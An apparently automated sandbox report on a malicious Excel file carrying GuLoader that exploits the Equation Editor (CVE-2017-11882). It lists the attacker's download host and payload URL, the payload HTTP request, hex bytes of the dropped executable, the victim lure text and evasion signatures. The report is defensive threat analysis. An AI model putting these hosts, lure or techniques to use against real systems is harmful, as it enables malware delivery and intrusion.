Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice Scan Copy.xlsx

Overview

General Information

Sample Name:Invoice Scan Copy.xlsx
Analysis ID:482507
MD5:026c63b9e090a6bf86cc8b6a4549290a
SHA1:39fa74d1c7de05c25466cb057ba984ec08c0848b
SHA256:6e6e60afa39ac72cca4e828ef18e8650105635cea693048061483b7e44f60497
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 200 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2204 cmdline: 'C:\Users\Public\vbc.exe' MD5: F378C63405C6FA0B24C2E4C142C42E9F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.141.149, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2204
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2204

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Invoice Scan Copy.xlsxReversingLabs: Detection: 25%
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeReversingLabs: Detection: 28%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 28%

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov edx, 31108335h
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov edx, 31108335h
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov edx, 31108335h
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, ecx
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.141.149:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49165 -> 192.3.141.149:80
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1lbI6ot82pXs)
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:46:06 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Sun, 12 Sep 2021 19:01:15 GMTETag: "1c000-5cbd0f90d4415"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 70 9a 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d 1b 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 68 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 5d 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /monday/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.149
    Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 38D58F94.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D58F94.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /monday/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editingfrom the 17 . . yellow bar above This document is 18 I! T a protected 3. Once you h
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00401500
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040285A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004028E2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00402A14
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00402A97
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004027D8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6429
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9039
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6433
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3430
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F582D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003FA02B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9220
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F621F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3218
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F7E13
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F520E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F2272
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F304A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F42B9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F08B8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F98A2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9888
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9880
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F22FF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F06E2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F52D0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9735
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F8330
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F4F28
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9518
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F717B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F4B7A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F4F78
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003FA771
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3562
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F895A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F8F46
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9146
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F01B7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F29A3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F419F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F0B97
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003FAB91
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F5DFB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F45F5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F53EA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F47E2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3DDD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F2DD0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6429 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6433 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: bin[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: Invoice Scan Copy.xlsxReversingLabs: Detection: 25%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Invoice Scan Copy.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF601.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winXLSX@4/21@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405C6C push cs; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405026 push ss; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407830 pushfd ; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040410D push cs; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405118 push ss; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403DC2 push ss; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004095EE push edi; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004055A1 push cs; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004086FC push cs; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00404AB2 pushfd ; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00403B71 pushfd ; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407719 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040532C pushad ; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405F32 push ecx; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405BC5 push cs; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004093E9 push cs; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004033F1 push ss; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F0058 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F00BA push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6384 push ebp; ret
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F8D84 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F8D84 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00401500 mov ebx, dword ptr fs:[00000030h]
